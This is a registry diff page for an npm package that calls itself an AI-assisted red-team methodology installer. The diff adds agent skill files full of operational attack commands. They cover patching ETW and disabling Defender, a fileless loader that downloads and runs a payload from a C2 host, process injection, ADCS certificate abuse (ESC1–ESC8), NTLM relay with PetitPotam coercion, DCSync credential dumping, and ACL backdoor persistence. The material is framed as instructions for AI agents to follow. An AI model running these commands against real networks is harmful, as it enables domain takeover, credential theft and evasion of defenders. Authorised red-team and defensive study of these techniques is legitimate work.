npm - rtexit-method - Versions diffs - 0.1.3 → 0.1.4 - Mend

rtexit-method 0.1.3 → 0.1.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (8) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "rtexit-method",
-  "version": "0.1.3",
+  "version": "0.1.4",
   "description": "RTExit - AI-assisted Red Team methodology installer",
   "license": "MIT",
   "author": "Exit Code",

package/packaged-assets/.agents/skills/rt-defense-evasion/SKILL.md CHANGED Viewed

@@ -985,3 +985,118 @@ After each technique, document the following in your engagement log:
 - Timestomping Forensics (Blanche): https://github.com/jipegit/OSXAuditor
 - SwiftOnSecurity Sysmon Config: https://github.com/SwiftOnSecurity/sysmon-config
 - Eventlogedit-evtx: https://github.com/3gstudent/Eventlogedit-evtx--Evolution
+---
+## ETW (Event Tracing for Windows) Patching
+ETW feeds data to Windows Defender, SIEM, and EDR tools. Patching ETW stops telemetry from reaching security tools.
+```powershell
+# Patch ETW in current PowerShell process
+$Signature = @'
+[DllImport("kernel32.dll")]
+public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
+[DllImport("kernel32.dll")]
+public static extern IntPtr GetModuleHandle(string lpModuleName);
+[DllImport("kernel32.dll")]
+public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
+'@
+$Win32 = Add-Type -MemberDefinition $Signature -Name "Win32" -Namespace "Win32Functions" -PassThru
+$ntdll = $Win32::GetModuleHandle("ntdll.dll")
+$addr  = $Win32::GetProcAddress($ntdll, "EtwEventWrite")
+$p = 0
+$Win32::VirtualProtect($addr, [uint32]4, 0x40, [ref]$p)
+$patch = [byte[]](0xC3)  # RET — function returns immediately
+[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $addr, 1)
+# Now ETW events from this process are suppressed
+```
+---
+## Sysmon Evasion
+Sysmon logs: Event 1 (process create), Event 3 (network), Event 11 (file write). Most blue teams rely on Sysmon.
+```powershell
+# Detect Sysmon
+Get-Process sysmon64 -ErrorAction SilentlyContinue
+fltMC  # SysmonDrv appears in filter driver list
+# Dump config to understand what's monitored
+sysmon64 -c
+# PPID spoofing — spawn payload from excluded parent (e.g., explorer.exe)
+# Most Sysmon configs exclude Microsoft-signed processes as parent
+# Use CreateProcess with UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_PARENT_PROCESS)
+# Fileless to avoid Event 11 (file creation)
+$bytes = (New-Object Net.WebClient).DownloadData("http://C2/payload.bin")
+$asm = [Reflection.Assembly]::Load($bytes)
+$asm.EntryPoint.Invoke($null, $null)
+```
+---
+## Advanced Process Injection
+### Classic DLL Injection
+```
+1. OpenProcess(target PID)
+2. VirtualAllocEx → allocate memory in target
+3. WriteProcessMemory → write DLL path
+4. CreateRemoteThread(LoadLibraryA, dll_path_ptr)
+```
+### Process Hollowing
+```
+1. CreateProcess(svchost.exe, SUSPENDED)
+2. NtUnmapViewOfSection → remove original code
+3. VirtualAllocEx + WriteProcessMemory → inject payload
+4. SetThreadContext(RIP = payload entry)
+5. ResumeThread → payload runs as svchost
+```
+### Early Bird APC Injection (EDR evasion — runs before hooks)
+```
+1. CreateProcess(target.exe, SUSPENDED)
+2. VirtualAllocEx + WriteProcessMemory (shellcode)
+3. QueueUserAPC(shellcode_addr, suspended_thread)
+4. ResumeThread → APC runs before EDR hooks initialize
+Tools: github.com/xuanxuan0/EarlyBird
+```
+### Indirect Syscalls (Bypass NTDLL hooks)
+```bash
+# EDRs hook NtAllocateVirtualMemory, NtCreateThread in NTDLL
+# Indirect syscalls: call syscall number directly, skip NTDLL
+git clone https://github.com/klezVirus/SysWhispers3
+python3 syswhispers.py --preset all -o syscalls
+# Generates stubs that invoke syscalls without touching hooked NTDLL
+# HellsGate: dynamically find SSNs at runtime
+git clone https://github.com/am0nsec/HellsGate
+```
+---
+## Disable Windows Defender (When Admin)
+```powershell
+# Disable real-time protection
+Set-MpPreference -DisableRealtimeMonitoring $true
+# Add exclusion (more subtle)
+Add-MpPreference -ExclusionPath "C:\Windows\Temp"
+Add-MpPreference -ExclusionProcess "powershell.exe"
+# Stop service (requires SYSTEM + Tamper Protection off)
+Stop-Service WinDefend -Force
+Set-Service WinDefend -StartupType Disabled
+# Tamper protection via registry (requires SYSTEM + no MDM)
+reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
+```
+---

package/packaged-assets/.agents/skills/rt-exploit-active-directory/SKILL.md CHANGED Viewed

@@ -1076,3 +1076,150 @@ Remediation:
 - AD CS ESC1-ESC8: https://posts.specterops.io/certified-pre-owned-d95910965cd2
 - Golden Ticket: https://adsecurity.org/?p=1640
 - Forest Trust Abuse: https://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/
+---
+## ADCS Integration — Certificate-Based Attack Paths
+> Full ADCS exploitation walkthrough is in **rt-exploit-adcs**. This section covers the AD integration points.
+```bash
+# After owning CA via ESC8 relay → full DCSync
+# Chain: PetitPotam → ntlmrelayx → ADCS cert → certipy auth → secretsdump
+# Quick ESC1 from AD foothold
+certipy find -u 'user@corp.local' -p 'Pass' -dc-ip DC_IP -vulnerable -stdout
+certipy req -u 'user@corp.local' -p 'Pass' -ca 'CORP-CA' -template 'VulnTemplate' -upn 'administrator@corp.local' -dc-ip DC_IP
+certipy auth -pfx administrator.pfx -dc-ip DC_IP
+impacket-secretsdump -hashes :OBTAINED_HASH corp.local/administrator@DC_IP
+```
+---
+## Kerberos Relay Attacks (NTLM → Kerberos Escalation)
+### LLMNR/NBT-NS Poisoning → NTLMv2 Capture
+```bash
+# Responder captures NTLMv2 challenge-response on the network
+sudo responder -I eth0 -dwv
+# Wait for network activity (file share access, web browsing, etc.)
+# Captured: CORP\john.smith::CORP:CHALLENGE:HASH
+# Crack offline
+hashcat -a 0 -m 5600 ntlmv2.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
+# Or relay instead of cracking (see below)
+```
+### NTLM Relay → SMB/LDAP
+```bash
+# Disable SMB + HTTP in Responder (we relay, not capture)
+sed -i 's/SMB = On/SMB = Off/; s/HTTP = On/HTTP = Off/' /etc/responder/Responder.conf
+# Run relay — target: DC LDAP (for RBCD or shadow creds) or target host SMB
+impacket-ntlmrelayx -t ldap://DC_IP --delegate-access -smb2support
+# --delegate-access: configures RBCD automatically on relayed machine account
+# Wait for Responder to capture auth → relay triggers
+# Relay to multiple SMB targets (spray)
+impacket-ntlmrelayx -tf targets.txt -smb2support -c "powershell -enc BASE64_PAYLOAD"
+```
+### PetitPotam — Unauthenticated NTLM Coercion
+```bash
+# Coerce DC to authenticate to attacker (triggers NTLM auth)
+# Works unauthenticated on older Windows (patched in Aug 2021, but still found)
+# Clone
+git clone https://github.com/topotam/PetitPotam
+# Unauthenticated (older systems)
+python3 PetitPotam.py -d '' -u '' -p '' ATTACKER_IP DC_IP
+# Authenticated (post-patch)
+python3 PetitPotam.py -d corp.local -u lowpriv -p Password1 ATTACKER_IP DC_IP
+# Combined with ADCS relay (ESC8)
+# Terminal 1: ntlmrelayx targeting ADCS
+impacket-ntlmrelayx -t http://CA_IP/certsrv/certfnsh.asp --adcs --template DomainController -smb2support
+# Terminal 2: coerce DC
+python3 PetitPotam.py ATTACKER_IP DC_IP
+# Get DC cert → certipy auth → DCSync
+```
+### PrinterBug (MS-RPRN) — Authenticated Coercion
+```bash
+# Requires domain credentials but works on patched systems
+git clone https://github.com/dirkjanm/krbrelayx
+python3 printerbug.py corp.local/lowpriv:Password1@DC_IP ATTACKER_IP
+# Combined with unconstrained delegation host
+# If you control a host with unconstrained delegation:
+# 1. Get TGT from DC (via printerbug coercion)
+# 2. Extract TGT from LSASS on delegation host
+# 3. Use TGT for DCSync
+mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit
+# Look for: [DC$@CORP.LOCAL].kirbi
+.\Rubeus.exe ptt /ticket:[DC$@CORP.LOCAL].kirbi
+impacket-secretsdump -k corp.local/DC$@dc.corp.local -no-pass
+```
+---
+## Shadow Admin — ACL-Based Persistence
+```bash
+# After domain compromise — create stealthy persistence via ACL backdoors
+# Instead of adding to Domain Admins (noisy), grant specific rights to a low-priv account
+# Option A — Grant DCSync rights to backdoor account
+# (Requires Domain Admin or WriteDacl on domain root)
+# Check current DACLs on domain object
+python3 /opt/impacket/examples/dacledit.py -action read -target-dn 'DC=corp,DC=local' \
+  -principal backdoor -dc-ip DC_IP corp.local/admin:Password1
+# Add DCSync rights (Replicating Directory Changes + Replicating Directory Changes All)
+python3 /opt/impacket/examples/dacledit.py -action write -rights DCSync \
+  -principal backdoor -target-dn 'DC=corp,DC=local' \
+  -dc-ip DC_IP corp.local/admin:Password1
+# Now backdoor account can DCSync without being in any admin group
+impacket-secretsdump corp.local/backdoor:Password1@DC_IP
+# Option B — AdminSDHolder modification (propagates to all protected groups)
+# Changes to AdminSDHolder propagate every 60 minutes to all admin group members
+python3 /opt/impacket/examples/dacledit.py -action write -rights FullControl \
+  -principal backdoor -target-dn 'CN=AdminSDHolder,CN=System,DC=corp,DC=local' \
+  -dc-ip DC_IP corp.local/admin:Password1
+# After 60 min → backdoor has FullControl over all DA/EA/etc accounts
+# Option C — WriteDacl on specific high-value accounts
+python3 /opt/impacket/examples/dacledit.py -action write -rights WriteMembers \
+  -principal backdoor -target-dn 'CN=Domain Admins,CN=Users,DC=corp,DC=local' \
+  -dc-ip DC_IP corp.local/admin:Password1
+# backdoor can now add itself to Domain Admins at will
+net rpc group addmem "Domain Admins" backdoor -U corp.local/backdoor%Password1 -S DC_IP
+```
+### ACL Detection & BloodHound
+```
+BloodHound query to find ACL paths:
+  MATCH p=shortestPath((n:User {name:"BACKDOOR@CORP.LOCAL"})-[:*1..]->(c:Computer))
+  RETURN p
+  MATCH (n:User)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain)
+  RETURN n.name
+```
+---

package/packaged-assets/.agents/skills/rt-exploit-adcs/SKILL.md ADDED Viewed

@@ -0,0 +1,395 @@
+---
+name: rt-exploit-adcs
+description: "Active Directory Certificate Services (ADCS) exploitation skill. ESC1 through ESC8 template abuse, misconfigured enrollment rights, SAN abuse for domain admin impersonation, relay attacks via certificate enrollment (ESC8), NTLM relay to ADCS HTTP endpoint, Certipy and Certify tooling, shadow credentials via msDS-KeyCredentialLink. Use when ADCS is deployed in the domain (default in 90%+ of enterprise environments)."
+---
+# rt-exploit-adcs — Active Directory Certificate Services Exploitation
+## Overview
+ADCS (Active Directory Certificate Services) is Microsoft's PKI implementation and is deployed by default in most enterprise environments. The "Certified Pre-Owned" research (SpecterOps, 2021) identified 8 escalation paths (ESC1–ESC8) that allow low-privileged domain users to escalate to Domain Admin by abusing misconfigured certificate templates, CA permissions, or enrollment endpoints.
+**Why ADCS matters:**
+- Deployed in ~90% of enterprise AD environments
+- Misconfigurations are common and rarely audited
+- Certificates survive password resets — persistence that outlasts credential rotations
+- ESC1 + ESC8 are the most commonly exploited in 2024 red team engagements
+---
+## Prerequisites
+- Domain user credentials (low-privilege is enough for ESC1–ESC4)
+- Network access to AD environment
+- Tools: `Certipy`, `Certify.exe`, `impacket`, `Rubeus`
+```bash
+# Install Certipy
+pip3 install certipy-ad
+# Or from source
+git clone https://github.com/ly4k/Certipy && cd Certipy && pip3 install .
+```
+---
+## Step 1 — Enumerate ADCS (Find the CA)
+```bash
+# Certipy — find all CAs and vulnerable templates
+certipy find -u 'user@corp.local' -p 'Password1' -dc-ip 10.10.10.1
+# Output: corp.local.zip (open with certipy-gui or inspect manually)
+# Key file: corp.local_Certipy.txt
+# Find only vulnerable templates
+certipy find -u 'user@corp.local' -p 'Password1' -dc-ip 10.10.10.1 -vulnerable -stdout
+# Certify.exe (Windows, in-memory preferred)
+.\Certify.exe find /vulnerable
+.\Certify.exe find /vulnerable /currentuser
+```
+**What to look for:**
+```
+Certificate Authorities
+  CA Name        : CORP-CA
+  DNS Name       : ca.corp.local
+  Enrollment Endpoint: http://ca.corp.local/certsrv/  ← ESC8 target
+Certificate Templates
+  Template Name  : VulnerableTemplate
+  Enrollee Supplies Subject: True  ← ESC1
+  Client Auth    : True            ← can be used for auth
+  Enabled        : True
+  Low-Priv Enroll: True            ← any domain user can enroll
+```
+---
+## ESC1 — Enrollee Supplies Subject (SAN Abuse)
+**Condition:** Template allows `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` + Client Authentication EKU + low-priv enrollment
+**Impact:** Request a certificate AS any user including Domain Admin
+```bash
+# Certipy — request cert as Domain Admin
+certipy req -u 'lowpriv@corp.local' -p 'Password1' \
+  -ca 'CORP-CA' \
+  -template 'VulnerableTemplate' \
+  -upn 'administrator@corp.local' \
+  -dc-ip 10.10.10.1
+# Output: administrator.pfx
+# Authenticate with the certificate → get NT hash
+certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
+# Output:
+# [*] Got hash for 'administrator@corp.local': aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889
+# Use hash for PTH
+impacket-wmiexec -hashes :fc525c9683e8fe067095ba2ddc971889 administrator@10.10.10.1
+```
+**Windows (Certify + Rubeus):**
+```powershell
+# Request certificate
+.\Certify.exe request /ca:ca.corp.local\CORP-CA /template:VulnerableTemplate /altname:administrator
+# Convert PEM to PFX
+openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
+# Auth with Rubeus
+.\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:'' /ptt
+.\Rubeus.exe klist
+```
+---
+## ESC2 — Any Purpose EKU
+**Condition:** Template has `Any Purpose` EKU or no EKU (SubCA)
+**Impact:** Can be used for client auth regardless of intended purpose
+```bash
+# Same as ESC1 — certipy req with the template
+certipy req -u 'lowpriv@corp.local' -p 'Password1' \
+  -ca 'CORP-CA' \
+  -template 'AnyPurposeTemplate' \
+  -dc-ip 10.10.10.1
+# Use the cert to enroll in ESC3 template (chain attack)
+```
+---
+## ESC3 — Enrollment Agent Templates
+**Condition:** Template 1 has Certificate Request Agent EKU; Template 2 allows enrollment agents to enroll on behalf
+**Impact:** Enroll as any user via two-step chain
+```bash
+# Step 1 — get enrollment agent certificate
+certipy req -u 'lowpriv@corp.local' -p 'Password1' \
+  -ca 'CORP-CA' \
+  -template 'EnrollmentAgentTemplate' \
+  -dc-ip 10.10.10.1
+# Output: lowpriv.pfx (enrollment agent cert)
+# Step 2 — use agent cert to request on behalf of admin
+certipy req -u 'lowpriv@corp.local' -p 'Password1' \
+  -ca 'CORP-CA' \
+  -template 'User' \
+  -on-behalf-of 'corp\administrator' \
+  -pfx lowpriv.pfx \
+  -dc-ip 10.10.10.1
+# Output: administrator.pfx
+# Authenticate
+certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
+```
+---
+## ESC4 — Vulnerable Template ACL (Write Permissions)
+**Condition:** Low-priv user has `WriteProperty` / `WriteDacl` / `WriteOwner` on a template
+**Impact:** Modify the template to introduce ESC1 conditions, then exploit
+```bash
+# Check who has write access to templates
+certipy find -u 'lowpriv@corp.local' -p 'Password1' -dc-ip 10.10.10.1 -vulnerable
+# Certipy — update template to enable ESC1
+certipy template -u 'lowpriv@corp.local' -p 'Password1' \
+  -template 'TargetTemplate' \
+  -save-old \
+  -dc-ip 10.10.10.1
+# Now exploit as ESC1
+certipy req -u 'lowpriv@corp.local' -p 'Password1' \
+  -ca 'CORP-CA' \
+  -template 'TargetTemplate' \
+  -upn 'administrator@corp.local' \
+  -dc-ip 10.10.10.1
+# Restore original template (cleanup)
+certipy template -u 'lowpriv@corp.local' -p 'Password1' \
+  -template 'TargetTemplate' \
+  -configuration TargetTemplate.json \
+  -dc-ip 10.10.10.1
+```
+---
+## ESC5 — Vulnerable PKI Object ACL
+**Condition:** Low-priv user has control over CA object, RPC/DCOM access, or AD CS container
+**Impact:** Full CA compromise
+```bash
+# Enumerate CA object ACLs
+certipy find -u 'lowpriv@corp.local' -p 'Password1' -dc-ip 10.10.10.1
+# If WriteOwner on CA — take ownership, add manager rights
+# Use RSAT-AD tools or PowerView to exploit ACL
+Import-Module ActiveDirectory
+Set-ADObject -Identity "CN=CORP-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local" -Add @{msPKI-Certificate-Name-Flag=1}
+```
+---
+## ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 Flag
+**Condition:** CA has `EDITF_ATTRIBUTESUBJECTALTNAME2` flag set on ANY template
+**Impact:** Supply SAN in any certificate request (even templates without CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
+```bash
+# Check CA flags
+certipy find -u 'lowpriv@corp.local' -p 'Password1' -dc-ip 10.10.10.1 -stdout | grep -i "ATTRIBUTESUBJECTALTNAME2"
+# If flag present — exploit like ESC1 on any Client Auth template
+certipy req -u 'lowpriv@corp.local' -p 'Password1' \
+  -ca 'CORP-CA' \
+  -template 'User' \
+  -upn 'administrator@corp.local' \
+  -dc-ip 10.10.10.1
+certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
+```
+---
+## ESC7 — Vulnerable CA Permissions
+**Condition:** User has `ManageCA` or `ManageCertificates` rights on the CA
+**Impact:** Approve pending requests, enable EDITF flag, issue certificates
+```bash
+# If ManageCA — enable SubCA template, then ESC1
+certipy ca -u 'lowpriv@corp.local' -p 'Password1' \
+  -ca 'CORP-CA' \
+  -enable-template 'SubCA' \
+  -dc-ip 10.10.10.1
+certipy req -u 'lowpriv@corp.local' -p 'Password1' \
+  -ca 'CORP-CA' \
+  -template 'SubCA' \
+  -upn 'administrator@corp.local' \
+  -dc-ip 10.10.10.1
+# Will fail — pending approval
+# Approve your own request (ManageCA right)
+certipy ca -u 'lowpriv@corp.local' -p 'Password1' \
+  -ca 'CORP-CA' \
+  -issue-request 42 \
+  -dc-ip 10.10.10.1
+# Retrieve issued cert
+certipy req -u 'lowpriv@corp.local' -p 'Password1' \
+  -ca 'CORP-CA' \
+  -retrieve 42 \
+  -dc-ip 10.10.10.1
+certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
+```
+---
+## ESC8 — NTLM Relay to ADCS HTTP Enrollment Endpoint
+**Condition:** Web Enrollment (`/certsrv/`) endpoint enabled; NTLM auth allowed; no EPA/signing
+**Impact:** Relay any domain machine account's NTLM auth to CA → get DC machine cert → DCSync
+```bash
+# Step 1 — check if web enrollment is active
+curl -I http://ca.corp.local/certsrv/
+# HTTP 401 with NTLM = vulnerable
+# Step 2 — set up NTLM relay targeting /certsrv/
+impacket-ntlmrelayx \
+  -t http://ca.corp.local/certsrv/certfnsh.asp \
+  --adcs \
+  --template 'DomainController' \
+  -smb2support
+# Step 3 — coerce DC authentication (PetitPotam or PrinterBug)
+# PetitPotam (unauthenticated in older Windows)
+python3 PetitPotam.py -d corp.local -u '' -p '' ATTACKER_IP DC_IP
+# PrinterBug (requires domain creds)
+python3 printerbug.py corp.local/lowpriv:Password1@DC_IP ATTACKER_IP
+# Step 4 — relay captures DC$ machine cert
+# ntlmrelayx output: DC$@corp.local.pfx
+# Step 5 — use DC machine cert to get TGT → DCSync
+certipy auth -pfx 'DC$@corp.local.pfx' -dc-ip 10.10.10.1
+# Gets NT hash of DC machine account
+# Step 6 — DCSync with machine account hash
+impacket-secretsdump -hashes :MACHINE_HASH 'corp.local/DC$@10.10.10.1'
+# Full domain dump: krbtgt, all user hashes
+```
+---
+## Shadow Credentials via msDS-KeyCredentialLink (ADCS Alternative)
+**Condition:** Write access to target object's `msDS-KeyCredentialLink` attribute
+**Impact:** Authenticate as target without knowing their password
+```bash
+# Certipy shadow — add shadow credential to target account
+certipy shadow auto -u 'lowpriv@corp.local' -p 'Password1' \
+  -account 'targetuser' \
+  -dc-ip 10.10.10.1
+# Output: targetuser.pfx + NT hash of targetuser
+# If targeting DC machine account (requires WriteDacl on DC object)
+certipy shadow auto -u 'lowpriv@corp.local' -p 'Password1' \
+  -account 'DC$' \
+  -dc-ip 10.10.10.1
+certipy auth -pfx 'DC$.pfx' -dc-ip 10.10.10.1
+impacket-secretsdump -hashes :DC_HASH 'corp.local/DC$@10.10.10.1'
+```
+---
+## Golden Certificate (Forge Any Certificate After CA Compromise)
+```bash
+# After owning CA server — extract CA private key
+certipy ca -backup -u 'administrator@corp.local' -p 'Password1' \
+  -ca 'CORP-CA' \
+  -dc-ip 10.10.10.1
+# Output: CORP-CA.pfx (CA cert + private key)
+# Forge certificate as any user — offline, no CA needed
+certipy forge -ca-pfx CORP-CA.pfx \
+  -upn 'administrator@corp.local' \
+  -subject 'CN=Administrator,CN=Users,DC=corp,DC=local'
+certipy auth -pfx administrator_forged.pfx -dc-ip 10.10.10.1
+```
+---
+## Skill Levels
+**BEGINNER:**
+- Run `certipy find -vulnerable` → identify ESC1 templates
+- Follow ESC1 path: req → auth → PTH
+**INTERMEDIATE:**
+- ESC4 template modification
+- ESC8 relay chain (PetitPotam + ntlmrelayx + certipy auth)
+- Shadow Credentials via BloodHound-identified WriteDacl paths
+**ADVANCED:**
+- ESC3 enrollment agent chains
+- ESC7 CA permission abuse
+- Golden Certificate after CA key extraction
+**EXPERT:**
+- Chaining ADCS with other misconfigs (RBCD + ADCS, ACL + ADCS)
+- Cross-forest ADCS attacks
+- ADCS persistence via template backdoors
+- Certificate-based C2 (authenticating beacons via certs)
+---
+## Detection & Cleanup Notes
+```
+Artifacts created:
+- Certificate enrollment events: Event ID 4886 (cert requested), 4887 (issued)
+- Location: CA audit logs (if enabled — often NOT enabled by default)
+- LDAP query for vulnerable templates: logged in LDAP query logs
+Cleanup:
+- Revoke issued certificates: certipy ca -revoke -serial <serial>
+- Restore modified templates: certipy template -configuration saved.json
+- Remove added shadow credentials: certipy shadow remove -account target
+```
+---
+## References
+- SpecterOps "Certified Pre-Owned": https://posts.specterops.io/certified-pre-owned-d95910965cd2
+- Certipy: https://github.com/ly4k/Certipy
+- Certify: https://github.com/GhostPack/Certify
+- ADCS ESC Techniques: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates